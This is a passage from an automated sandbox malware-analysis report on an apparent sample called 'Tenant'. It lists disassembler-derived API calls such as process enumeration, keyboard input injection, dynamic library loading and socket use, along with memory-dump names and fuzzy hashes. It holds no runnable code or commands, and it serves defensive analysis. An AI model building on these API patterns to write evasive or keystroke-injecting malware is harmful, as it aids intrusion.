• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
• Opcode ID: ab9b8bba5df22886e31c5013cd86bac156c009697dea899c82af3993c75bd23e
• Instruction ID: 799ccddcfc8b409880706f49c6ff0d32cb6d0e598780d737deb9d152417469fb
• Opcode Fuzzy Hash: ab9b8bba5df22886e31c5013cd86bac156c009697dea899c82af3993c75bd23e
• Instruction Fuzzy Hash: 0CD0C231520B128FD320AF30DC1874A72D8AF05341F208CA9E481D6562DE70C490C640
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AB4B44,?,00AB49D4,?,?,00AB27AF,?,00000001), ref: 00AB4B85
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AB4B97
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        • Opcode ID: f37e312ee10b2978656017a6648922d5c13ae9f3f679b443fe63b984d6192c80
                                                                                        • Instruction ID: beb4c6450b9783c5a9601b46be51f3351bd7902fb8bcc06b17371ae84f85db99
                                                                                        • Opcode Fuzzy Hash: f37e312ee10b2978656017a6648922d5c13ae9f3f679b443fe63b984d6192c80
                                                                                        • Instruction Fuzzy Hash: 0DD05B70520752CFD720AF35DC28B4A76D8AF05351F61C86DE4C5E3561DF70D480C650
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00B21696), ref: 00B21455
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B21467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        • Opcode ID: 820dc96125b7ed14d31d73c1b9bbf7fdf527222ba9c79ae99cae994b77caaf1d
                                                                                        • Instruction ID: a650e0bbd3970a521f0bb1496c73effc03e7ab6a7709b71449a31c32bf734425
                                                                                        • Opcode Fuzzy Hash: 820dc96125b7ed14d31d73c1b9bbf7fdf527222ba9c79ae99cae994b77caaf1d
                                                                                        • Instruction Fuzzy Hash: 61D01230510B228FD7206F75D80870676D5AF16396F11CCAAA8E9E3660DA74E8C0CA60
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AB5E3D), ref: 00AB55FE
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AB5610
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        • Opcode ID: d5e04f4978d6bf976769a7366ef5455365beadc2c2359f1e10714807013df387
                                                                                        • Instruction ID: 8d295405ee2190b3c5a4eea076a102d51caf90aab990bd66ae400bd3241f1457
                                                                                        • Opcode Fuzzy Hash: d5e04f4978d6bf976769a7366ef5455365beadc2c2359f1e10714807013df387
                                                                                        • Instruction Fuzzy Hash: 26D01274D30B128FD720AF35C82875A77D8AF05355F259869E485D2161DA70C480DA50
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B193DE,?,00B30980), ref: 00B197D8
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B197EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        • Opcode ID: 964fedb6991a616ca1fe352ec5a35ade9f2a467ce49324135e848e99ec5aa1ad
                                                                                        • Instruction ID: 22a356603fe0c045e5dd08c7ecc1312a9b1a79fc148fd2223f612cf5f7580db7
                                                                                        • Opcode Fuzzy Hash: 964fedb6991a616ca1fe352ec5a35ade9f2a467ce49324135e848e99ec5aa1ad
                                                                                        • Instruction Fuzzy Hash: 76D012705207138FD720AF35D8A875AB6D4EF05391F2188A9E4D5E21A0DF70C8C0C651
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c7d9b88bf2c85729a26f78ef695d2bfcaecd2acf08d52dab08df3e74def42635
                                                                                        • Instruction ID: 2fee5960930a3bff69eb6d633146a641d24f6ea532b2b5ae62dda156403b7553
                                                                                        • Opcode Fuzzy Hash: c7d9b88bf2c85729a26f78ef695d2bfcaecd2acf08d52dab08df3e74def42635
                                                                                        • Instruction Fuzzy Hash: F7C14875A0021AEFCB14CF98C884ABEB7B5FF48714B618599F905EB251DB31ED81CB90
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00B1E7A7
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00B1E7EA
                                                                                          • Part of subcall function 00B1DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B1DEAE
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B1E9EA
                                                                                        • _memmove.LIBCMT ref: 00B1E9FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3659485706-0
                                                                                        • Opcode ID: 8ea7ccd43633864413c4fb986f84fe7fbac265188f068a44d742b3e6f0268b91
                                                                                        • Instruction ID: 06c36348192f983b536e2e43b40a761584b95b932d0cf6db1f27ffa480c98983
                                                                                        • Opcode Fuzzy Hash: 8ea7ccd43633864413c4fb986f84fe7fbac265188f068a44d742b3e6f0268b91
                                                                                        • Instruction Fuzzy Hash: 18C16B71A08301DFC714DF28C4909AABBE4FF89714F5489ADF8A99B351D731E985CB82
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B187AD
                                                                                        • CoUninitialize.OLE32 ref: 00B187B8
                                                                                          • Part of subcall function 00B2DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00B18A0E,?,00000000), ref: 00B2DF71
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B187C3
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B18A94
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 780911581-0
                                                                                        • Opcode ID: f325cd780ef93e8845a2edd92b71a8f0b9f02ff015a7f9f8554673598daa890a
                                                                                        • Instruction ID: 98f82a0a6c1b40aef29ad61c8a6b6d3d0c2615ed267892b2a8e6ab1196166953
                                                                                        • Opcode Fuzzy Hash: f325cd780ef93e8845a2edd92b71a8f0b9f02ff015a7f9f8554673598daa890a
                                                                                        • Instruction Fuzzy Hash: 96A14675604B019FD710EF24C581B6AB7E4FF89350F548889F99A9B3A1CB70ED84CB92
                                                                                        APIs
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B33C4C,?), ref: 00AF8308
                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B33C4C,?), ref: 00AF8320
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00B30988,000000FF,?,00000000,00000800,00000000,?,00B33C4C,?), ref: 00AF8345
                                                                                        • _memcmp.LIBCMT ref: 00AF8366
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 314563124-0
                                                                                        • Opcode ID: f85bf238bdbc18d4f70a62f044072f18ade6189a3cdd1859bf14c2fe28d0ae17
                                                                                        • Instruction ID: eb9b72a2721b542d3a3c9e901476b04b7bf580031954c4a1c1e7704508de52d4
                                                                                        • Opcode Fuzzy Hash: f85bf238bdbc18d4f70a62f044072f18ade6189a3cdd1859bf14c2fe28d0ae17
                                                                                        • Instruction Fuzzy Hash: 32810871A00109EFCB04DFD4C988EEEB7B9FF89715B204598F515AB260DB75AE05CB60
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        • Opcode ID: 4165765d43a866b868726eca07d78d001439e11c20d32a5a267fe1cef875171c
                                                                                        • Instruction ID: 6d56831719282edbb8893863e976fca5746060d44c174cd5513509069418600f
                                                                                        • Opcode Fuzzy Hash: 4165765d43a866b868726eca07d78d001439e11c20d32a5a267fe1cef875171c
                                                                                        • Instruction Fuzzy Hash: 1451B53060870A9BDB60AFB9D895A3DF3F5AF45350B30981FF696C72E1EB7098408B05
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00B1F526
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00B1F534
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00B1F5F4
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B1F603
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2576544623-0
                                                                                        • Opcode ID: 4adcbba6803c22426cf321f4f319585f5ed8630e89a8f5f0b2d35be2182f38bf
                                                                                        • Instruction ID: 976231eba8530a15f60fcff883f06bc23d749ea34baa07b443f11f9c6ad07c68
                                                                                        • Opcode Fuzzy Hash: 4adcbba6803c22426cf321f4f319585f5ed8630e89a8f5f0b2d35be2182f38bf
                                                                                        • Instruction Fuzzy Hash: E8517D71504311AFD310EF24DC96EAFBBE8EF99700F50492DF595972A2EB70A904CB92
APIs
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
• Instruction ID: 7d1f69868400345489bb9f6e7e79aa1bc4878110ecca1fb23f84923dcd63f26c
• Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
• Instruction Fuzzy Hash: 7941B835A007169BDF28CF69C8A0FAF7BB5AF483A0B25823DE45587650D770DD408B4C
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00AFA68A
• __itow.LIBCMT ref: 00AFA6BB
  • Part of subcall function 00AFA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00AFA976
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00AFA724
• __itow.LIBCMT ref: 00AFA77B
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: b3e5bc3c97e52d4cf8547653103b4dc61dd7fcf6f7b2a96e384b6db2446c4b59
• Instruction ID: e4f6b1d926c07143dc3f53b2dc199a57e0e31eb3fc8aa4378a4e2ca0a5ddc48f
• Opcode Fuzzy Hash: b3e5bc3c97e52d4cf8547653103b4dc61dd7fcf6f7b2a96e384b6db2446c4b59
• Instruction Fuzzy Hash: 224184B4A0030DABDF11EF94C955FFE7BB9EF54750F440059FA09A3292DB709944CA92
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00B170BC
• WSAGetLastError.WSOCK32(00000000), ref: 00B170CC
  • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
  • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B17130
• WSAGetLastError.WSOCK32(00000000), ref: 00B1713C
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
• Opcode ID: 3cea487074a154a6159ef22ee4ac932bf0b7c5ca32e34ff25ecf659d05d1a9d5
• Instruction ID: 04aade947b77f2c05fe8ff9402fbd4dc244668fd0309d1bc947678b0e2dd0340
• Opcode Fuzzy Hash: 3cea487074a154a6159ef22ee4ac932bf0b7c5ca32e34ff25ecf659d05d1a9d5
• Instruction Fuzzy Hash: FA41A271740200AFE721AF24DD86F6E77E4DF49B10F548458FA59AB3D2DBB09C008B91
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B30980), ref: 00B16B92
• _strlen.LIBCMT ref: 00B16BC4
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: 8b7d9eb89b47c0600196aa0385826d9a68ef55f77ae2d307431789f50dba02bc
• Instruction ID: 46241da82dfcfad281f7a54d1e4b76ac5a49bcbd715290efdea391134d1719a7
• Opcode Fuzzy Hash: 8b7d9eb89b47c0600196aa0385826d9a68ef55f77ae2d307431789f50dba02bc
• Instruction Fuzzy Hash: 0F41B031A04108AFCB14EBA4CED1EEEB3E9EF55310F548199F91A9B292DB30AD41C790
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B28F03
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: d395b7843be40b234d31584d6156fd82e540255ca472dcd6176c70425b437977
• Instruction ID: 0434f055fed71be525e9a4a80982447baaf7122dbbca3ec0c9a42fc870b63e34
• Opcode Fuzzy Hash: d395b7843be40b234d31584d6156fd82e540255ca472dcd6176c70425b437977
• Instruction Fuzzy Hash: A3310630652228AFEF209A18ED85FAC37E6EB05310F244D91FA19D71E0CF74E950CB91
APIs
• ClientToScreen.USER32(?,?), ref: 00B2B1D2
• GetWindowRect.USER32(?,?), ref: 00B2B248
• PtInRect.USER32(?,?,00B2C6BC), ref: 00B2B258
• MessageBeep.USER32(00000000), ref: 00B2B2C9
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 493ba7f67d7832d47e257bb7e5d0096faae7562d04f2cd0bd4d49812e5c106d1
• Instruction ID: 6264b8ff1368cfc9ccd19bbe27b708426752a4b3e5a26eb82ed011226a390272
• Opcode Fuzzy Hash: 493ba7f67d7832d47e257bb7e5d0096faae7562d04f2cd0bd4d49812e5c106d1
• Instruction Fuzzy Hash: C8413930A04229DFDB11CF99E884EAD7BF5FF49315F2885E9E8189B255DB30A941CB90
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B01326
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00B01342
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B013A8
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B013FA
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: a4c2fa2675a89e35cb2b7be4bd7dd73ade9fc2362d47277cd4c6569d1ca02b4f
• Instruction ID: 9e033d045d2e41fd05afc08142b43a4d15019ce10a61613e696957a325dfc876
• Opcode Fuzzy Hash: a4c2fa2675a89e35cb2b7be4bd7dd73ade9fc2362d47277cd4c6569d1ca02b4f
• Instruction Fuzzy Hash: 37314830A40208BEFF398A2D8C45BFE7FF9EB44320F04869AF590526D1D7748D519B69
APIs
• GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00B01465
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00B01481
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00B014E0
• SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00B01532
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
